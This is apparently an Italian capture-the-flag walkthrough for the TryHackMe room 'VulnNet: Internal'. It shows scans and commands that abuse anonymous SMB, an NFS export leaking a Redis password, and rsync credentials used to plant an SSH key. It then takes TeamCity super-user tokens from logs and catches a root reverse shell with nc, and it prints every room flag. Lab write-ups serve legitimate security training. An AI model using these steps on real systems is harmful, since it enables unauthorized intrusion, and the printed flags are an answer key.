• Autore room: TheCyb3rW0lf
  • Sistema operativo: Linux (obbligatorio)
  • Difficoltà: Easy/Medium

LINK:https://tryhackme.com/room/vulnnetinternal

Descrizione:
VulnNet Entertainment è un'azienda che impara dai propri errori. Si sono subito resi conto che non potevano creare un'applicazione Web adeguatamente protetta, quindi hanno rinunciato a quell'idea. Invece, hanno deciso di istituire servizi interni per scopi commerciali. Come al solito, hai il compito di eseguire un penetration test della loro rete e segnalare i tuoi risultati.
Questa macchina è stata progettata per essere esattamente l'opposto delle macchine precedenti di questa serie e si concentra sui servizi interni. Dovrebbe mostrarti come recuperare informazioni interessanti e usarle per ottenere l'accesso al sistema. Segnala i tuoi risultati inviando i flag corretti.

INIZIAMO CON IL SCOPRIRE LA SERVICES FLAG:

  • Partiamo subito con una scansione su Nmap per le porte aperte:

    PORT      STATE    SERVICE     VERSION
    22/tcp    open     ssh         OpenSSH 7.6p1 Ubuntu 4ubuntu0.3 (Ubuntu Linux; protocol 2.0)
    | ssh-hostkey: 
    |   2048 5e:27:8f:48:ae:2f:f8:89:bb:89:13:e3:9a:fd:63:40 (RSA)
    |   256 f4:fe:0b:e2:5c:88:b5:63:13:85:50:dd:d5:86:ab:bd (ECDSA)
    |_  256 82:ea:48:85:f0:2a:23:7e:0e:a9:d9:14:0a:60:2f:ad (ED25519)
    111/tcp   open     rpcbind     2-4 (RPC #100000)
    | rpcinfo: 
    |   program version    port/proto  service
    |   100000  2,3,4        111/tcp   rpcbind
    |   100000  2,3,4        111/udp   rpcbind
    |   100000  3,4          111/tcp6  rpcbind
    |   100000  3,4          111/udp6  rpcbind
    |   100003  3           2049/udp   nfs
    |   100003  3           2049/udp6  nfs
    |   100003  3,4         2049/tcp   nfs
    |   100003  3,4         2049/tcp6  nfs
    |   100005  1,2,3      35973/tcp   mountd
    |   100005  1,2,3      50743/udp   mountd
    |   100005  1,2,3      50821/tcp6  mountd
    |   100005  1,2,3      60228/udp6  mountd
    |   100021  1,3,4      33804/udp6  nlockmgr
    |   100021  1,3,4      35968/udp   nlockmgr
    |   100021  1,3,4      38965/tcp6  nlockmgr
    |   100021  1,3,4      44305/tcp   nlockmgr
    |   100227  3           2049/tcp   nfs_acl
    |   100227  3           2049/tcp6  nfs_acl
    |   100227  3           2049/udp   nfs_acl
    |_  100227  3           2049/udp6  nfs_acl
    139/tcp   open     netbios-ssn Samba smbd 3.X - 4.X (workgroup: WORKGROUP)
    445/tcp   open     netbios-ssn Samba smbd 4.7.6-Ubuntu (workgroup: WORKGROUP)
    873/tcp   open     rsync       (protocol version 31)
    2049/tcp  open     nfs_acl     3 (RPC #100227)
    6379/tcp  open     redis       Redis key-value store
    9090/tcp  filtered zeus-admin
    35973/tcp open     mountd      1-3 (RPC #100005)
    39613/tcp open     mountd      1-3 (RPC #100005)
    42041/tcp open     java-rmi    Java RMI
    44305/tcp open     nlockmgr    1-4 (RPC #100021)
    49833/tcp open     mountd      1-3 (RPC #100005)
    Service Info: Host: VULNNET-INTERNAL; OS: Linux; CPE: cpe:/o:linux:linux_kernel
  • Elenchiamo Samba:

    ┌──(user㉿parrot)-[/data/VulnNet_Internal]
    └─$ smbclient -L 10.10.190.83                              
    Enter WORKGROUP\kali's password: 
    
        Sharename       Type      Comment
        ---------       ----      -------
        print$          Disk      Printer Drivers
        shares          Disk      VulnNet Business Shares
        IPC$            IPC       IPC Service (vulnnet-internal server (Samba, Ubuntu))
    SMB1 disabled -- no workgroup available
  • Ora fortunatamente possiamo accedere senza credenziali e leggere il contenuto del file services.txt che contiene la flag che ci serve:

    ┌──(user㉿parrot)-[/data/VulnNet_Internal]
    └─$ smbclient //10.10.190.83/shares
    Enter WORKGROUP\kali's password: 
    Try "help" to get a list of possible commands.
    smb: \> ls
      .                                   D        0  Tue Feb  2 10:20:09 2021
      ..                                  D        0  Tue Feb  2 10:28:11 2021
      temp                                D        0  Sat Feb  6 12:45:10 2021
      data                                D        0  Tue Feb  2 10:27:33 2021
    
            11309648 blocks of size 1024. 3275768 blocks available
    smb: \> cd temp
    smb: \temp\> ls
      .                                   D        0  Sat Feb  6 12:45:10 2021
      ..                                  D        0  Tue Feb  2 10:20:09 2021
      services.txt                        N       38  Sat Feb  6 12:45:09 2021
    
            11309648 blocks of size 1024. 3275768 blocks available
    smb: \temp\> get services.txt -
    THM{0a09d51e488f5fa105d8d866a497440a}
    getting file \temp\services.txt of size 38 as - (0.1 KiloBytes/sec) (average 0.1 KiloBytes/sec)

    Abbiamo quindi trovato la FLAG: THM{0a09d51e488f5fa105d8d866a497440a}

PROCEDIAMO CON LA INTERNAL FLAG:

La scansione di Nmap ha rivelato una condivisione NFS:

┌──(user㉿parrot)-[/data/VulnNet_Internal/files]
└─$ mkdir tmp/

┌──(user㉿parrot)-[/data/VulnNet_Internal/files]
└─$ sudo mount -t nfs 10.10.190.83: tmp     
                                                                                                                     
┌──(user㉿parrot)-[/data/VulnNet_Internal/files]
└─$ tree tmp             
tmp
└── opt
    └── conf
        ├── hp
        │   └── hplip.conf
        ├── init
        │   ├── anacron.conf
        │   ├── lightdm.conf
        │   └── whoopsie.conf
        ├── opt
        ├── profile.d
        │   ├── bash_completion.sh
        │   ├── cedilla-portuguese.sh
        │   ├── input-method-config.sh
        │   └── vte-2.91.sh
        ├── redis
        │   └── redis.conf
        ├── vim
        │   ├── vimrc
        │   └── vimrc.tiny
        └── wildmidi
            └── wildmidi.cfg
  • Attenzione che il file redis.conf contiene la password per il server Redis:

    ┌──(user㉿parrot)-[/data/…/files/opt/conf/redis]
    └─$ grep -Ev "^#|^$" redis.conf
    rename-command FLUSHDB ""
    rename-command FLUSHALL ""
    bind 127.0.0.1 ::1
    protected-mode yes
    port 6379
    tcp-backlog 511
    timeout 0
    tcp-keepalive 300
    daemonize yes
    supervised no
    pidfile /var/run/redis/redis-server.pid
    loglevel notice
    logfile /var/log/redis/redis-server.log
    databases 16
    always-show-logo yes
    save 900 1
    save 300 10
    save 60 10000
    stop-writes-on-bgsave-error yes
    rdbcompression yes
    rdbchecksum yes
    dbfilename dump.rdb
    dir /var/lib/redis
    slave-serve-stale-data yes
    requirepass "B65Hx562F@ggAZ@F" <-------------------- password
    slave-read-only yes
    repl-diskless-sync no
    repl-diskless-sync-delay 5
    repl-disable-tcp-nodelay no
    slave-priority 100
    lazyfree-lazy-eviction no
    lazyfree-lazy-expire no
    lazyfree-lazy-server-del no
    slave-lazy-flush no
    appendonly no
    appendfilename "appendonly.aof"
    appendfsync everysec
    no-appendfsync-on-rewrite no
    auto-aof-rewrite-percentage 100
    auto-aof-rewrite-min-size 64mb
    aof-load-truncated yes
    aof-use-rdb-preamble no
    lua-time-limit 5000
    slowlog-log-slower-than 10000
    slowlog-max-len 128
    latency-monitor-threshold 0
    notify-keyspace-events ""
    hash-max-ziplist-entries 512
    hash-max-ziplist-value 64
    list-max-ziplist-size -2
    list-compress-depth 0
    set-max-intset-entries 512
    zset-max-ziplist-entries 128
    zset-max-ziplist-value 64
    hll-sparse-max-bytes 3000
    activerehashing yes
    client-output-buffer-limit normal 0 0 0
    client-output-buffer-limit slave 256mb 64mb 60
    client-output-buffer-limit pubsub 32mb 8mb 60
    hz 10
    aof-rewrite-incremental-fsync yes
  • Analizziamo il file per la flag:

    ┌──(user㉿parrot)-[/data/…/files/opt/conf/redis]
    └─$ redis-cli -h 10.10.190.83 -a "B65Hx562F@ggAZ@F"
    Warning: Using a password with '-a' or '-u' option on the command line interface may not be safe.
    10.10.190.83:6379> ping
    PONG
    
    10.10.190.83:6379> KEYS *
    1) "tmp"
    2) "marketlist"
    3) "authlist"
    4) "internal flag"
    5) "int"
    10.10.190.83:6379> 
    10.10.190.83:6379> KEYS "internal flag"
    1) "internal flag"
    10.10.190.83:6379> GET "internal flag"
    "THM{ff8e518addbbddb74531a724236a8221}"
  • La flag è: THM{ff8e518addbbddb74531a724236a8221}

USER FLAG:

┌──(user㉿parrot)-[/data/VulnNet_Internal/files]
└─$ redis-cli -h 10.10.190.83 -a "B65Hx562F@ggAZ@F"                       
Warning: Using a password with '-a' or '-u' option on the command line interface may not be safe.
10.10.190.83:6379> KEYS *
1) "internal flag"
2) "authlist"
3) "marketlist"
4) "int"
5) "tmp"
10.10.190.83:6379> GET authlist
(error) WRONGTYPE Operation against a key holding the wrong kind of value
10.10.190.83:6379> LRANGE authlist 1 100
1) "QXV0aG9yaXphdGlvbiBmb3IgcnN5bmM6Ly9yc3luYy1jb25uZWN0QDEyNy4wLjAuMSB3aXRoIHBhc3N3b3JkIEhjZzNIUDY3QFRXQEJjNzJ2Cg=="
2) "QXV0aG9yaXphdGlvbiBmb3IgcnN5bmM6Ly9yc3luYy1jb25uZWN0QDEyNy4wLjAuMSB3aXRoIHBhc3N3b3JkIEhjZzNIUDY3QFRXQEJjNzJ2Cg=="
3) "QXV0aG9yaXphdGlvbiBmb3IgcnN5bmM6Ly9yc3luYy1jb25uZWN0QDEyNy4wLjAuMSB3aXRoIHBhc3N3b3JkIEhjZzNIUDY3QFRXQEJjNzJ2Cg=="
10.10.190.83:6379> 

┌──(user㉿parrot)-[/data/VulnNet_Internal/files]
└─$ echo "QXV0aG9yaXphdGlvbiBmb3IgcnN5bmM6Ly9yc3luYy1jb25uZWN0QDEyNy4wLjAuMSB3aXRoIHBhc3N3b3JkIEhjZzNIUDY3QFRXQEJjNzJ2Cg==" | base64 -d
Authorization for rsync://rsync-connect@127.0.0.1 with password Hcg3HP67@TW@Bc72v

┌──(user㉿parrot)-[/data/VulnNet_Internal/files]
└─$ rsync --list-only rsync://10.10.190.83                                                                     23 ⨯
files           Necessary home interaction

┌──(user㉿parrot)-[/data/VulnNet_Internal/files]
└─$ rsync --list-only rsync://10.10.190.83                                                                     23 ⨯
files           Necessary home interaction

┌──(user㉿parrot)-[/data/VulnNet_Internal/files]
└─$ cp ~/.ssh/id_rsa.pub authorized_keys

┌──(user㉿parrot)-[/data/VulnNet_Internal/files]
└─$ rsync authorized_keys rsync://rsync-connect@10.10.190.83/files/sys-internal/.ssh                            3 ⨯

┌──(user㉿parrot)-[/data/VulnNet_Internal/files]
└─$ ssh sys-internal@10.10.190.83        
sys-internal@vulnnet-internal:~$ cat user.txt 
THM{da7c20696831f253e0afaca8b83c07ab}

USER FLAG: THM{da7c20696831f253e0afaca8b83c07ab}



ROOT FLAG:

sys-internal@vulnnet-internal:/$ ls -la /
total 533824
drwxr-xr-x  24 root root      4096 Feb  6 12:58 ./
drwxr-xr-x  24 root root      4096 Feb  6 12:58 ../
drwxr-xr-x   2 root root      4096 Feb  2 14:05 bin/
drwxr-xr-x   3 root root      4096 Feb  1 14:02 boot/
drwx------   2 root root      4096 Feb  1 13:41 .cache/
drwxr-xr-x  17 root root      3720 May 27 07:34 dev/
drwxr-xr-x 129 root root     12288 Feb  7 19:21 etc/
drwxr-xr-x   3 root root      4096 Feb  1 13:51 home/
lrwxrwxrwx   1 root root        34 Feb  1 14:01 initrd.img -> boot/initrd.img-4.15.0-135-generic
lrwxrwxrwx   1 root root        33 Feb  1 13:30 initrd.img.old -> boot/initrd.img-4.15.0-20-generic
drwxr-xr-x  18 root root      4096 Feb  1 13:43 lib/
drwxr-xr-x   2 root root      4096 Feb  1 13:28 lib64/
drwx------   2 root root     16384 Feb  1 13:27 lost+found/
drwxr-xr-x   4 root root      4096 Feb  2 10:49 media/
drwxr-xr-x   2 root root      4096 Feb  1 13:27 mnt/
drwxr-xr-x   4 root root      4096 Feb  2 10:28 opt/
dr-xr-xr-x 136 root root         0 May 27 07:33 proc/
drwx------   8 root root      4096 Feb  6 13:32 root/
drwxr-xr-x  27 root root       880 May 27 08:37 run/
drwxr-xr-x   2 root root      4096 Feb  2 14:06 sbin/
drwxr-xr-x   2 root root      4096 Feb  1 13:27 srv/
-rw-------   1 root root 546529280 Feb  1 13:27 swapfile
dr-xr-xr-x  13 root root         0 May 27 08:39 sys/
drwxr-xr-x  12 root root      4096 Feb  6 13:30 TeamCity/ <----------------------- interesting
drwxrwxrwt  11 root root      4096 May 27 08:40 tmp/
drwxr-xr-x  10 root root      4096 Feb  1 13:27 usr/
drwxr-xr-x  13 root root      4096 Feb  1 13:43 var/
lrwxrwxrwx   1 root root        31 Feb  1 14:01 vmlinuz -> boot/vmlinuz-4.15.0-135-generic
lrwxrwxrwx   1 root root        30 Feb  1 13:30 vmlinuz.old -> boot/vmlinuz-4.15.0-20-generic

sys-internal@vulnnet-internal:~$ ss -ltp
State       Recv-Q       Send-Q                    Local Address:Port                       Peer Address:Port       
LISTEN      0            50                              0.0.0.0:microsoft-ds                    0.0.0.0:*          
LISTEN      0            128                             0.0.0.0:39391                           0.0.0.0:*          
LISTEN      0            64                              0.0.0.0:nfs                             0.0.0.0:*          
LISTEN      0            128                             0.0.0.0:33735                           0.0.0.0:*          
LISTEN      0            5                               0.0.0.0:rsync                           0.0.0.0:*          
LISTEN      0            50                              0.0.0.0:netbios-ssn                     0.0.0.0:*          
LISTEN      0            128                             0.0.0.0:6379                            0.0.0.0:*          
LISTEN      0            128                             0.0.0.0:sunrpc                          0.0.0.0:*          
LISTEN      0            64                              0.0.0.0:34769                           0.0.0.0:*          
LISTEN      0            128                       127.0.0.53%lo:domain                          0.0.0.0:*          
LISTEN      0            128                             0.0.0.0:ssh                             0.0.0.0:*          
LISTEN      0            5                             127.0.0.1:ipp                             0.0.0.0:*          
LISTEN      0            128                             0.0.0.0:33145                           0.0.0.0:*          
LISTEN      0            50                   [::ffff:127.0.0.1]:57882                                 *:*          
LISTEN      0            50                                 [::]:microsoft-ds                       [::]:*          
LISTEN      0            64                                 [::]:nfs                                [::]:*          
LISTEN      0            50                                    *:9090                                  *:*          
LISTEN      0            1                    [::ffff:127.0.0.1]:8105                                  *:*          
LISTEN      0            5                                  [::]:rsync                              [::]:*          
LISTEN      0            128                               [::1]:6379                               [::]:*          
LISTEN      0            50                                 [::]:netbios-ssn                        [::]:*          
LISTEN      0            100                  [::ffff:127.0.0.1]:8111                                  *:*  <------------ TeamCity running on localhost on port 8111        
LISTEN      0            128                                [::]:sunrpc                             [::]:*          
LISTEN      0            64                                 [::]:33363                              [::]:*          
LISTEN      0            128                                [::]:40659                              [::]:*          
LISTEN      0            128                                [::]:ssh                                [::]:*          
LISTEN      0            50                                    *:35095                                 *:*          
LISTEN      0            128                                [::]:38359                              [::]:*          
LISTEN      0            5                                 [::1]:ipp                                [::]:*          
LISTEN      0            128                                [::]:46425                              [::]:*    

$ ssh -L 8111:127.0.0.1:8111 sys-internal@10.10.190.83

sys-internal@vulnnet-internal:/TeamCity$ grep -iR token /TeamCity/logs/ 2>/dev/null
/TeamCity/logs/catalina.out:[TeamCity] Super user authentication token: 8446629153054945175 (use empty username with the token as the password to access the server)
/TeamCity/logs/catalina.out:[TeamCity] Super user authentication token: 8446629153054945175 (use empty username with the token as the password to access the server)
/TeamCity/logs/catalina.out:[TeamCity] Super user authentication token: 3782562599667957776 (use empty username with the token as the password to access the server)
/TeamCity/logs/catalina.out:[TeamCity] Super user authentication token: 5812627377764625872 (use empty username with the token as the password to access the server)
/TeamCity/logs/catalina.out:[TeamCity] Super user authentication token: 4174796436262174108 (use empty username with the token as the password to access the server)
/TeamCity/logs/catalina.out:[TeamCity] Super user authentication token: 4174796436262174108 (use empty username with the token as the password to access the server)

┌──(user㉿parrot)-[/data/VulnNet_Internal/files]
└─$ nc -nlvp 4444    
listening on [any] 4444 ...
connect to [10.8.50.72] from (UNKNOWN) [10.10.190.83] 48482
bash: cannot set terminal process group (481): Inappropriate ioctl for device
bash: no job control in this shell
root@vulnnet-internal:/TeamCity/buildAgent/work/2b35ac7e0452d98f# cat /root/root.txt
<uildAgent/work/2b35ac7e0452d98f# cat /root/root.txt              
THM{e8996faea46df09dba5676dd271c60bd}

ROOT FLAG: THM{e8996faea46df09dba5676dd271c60bd}

Powered by: FreeFlarum.
(remove this footer)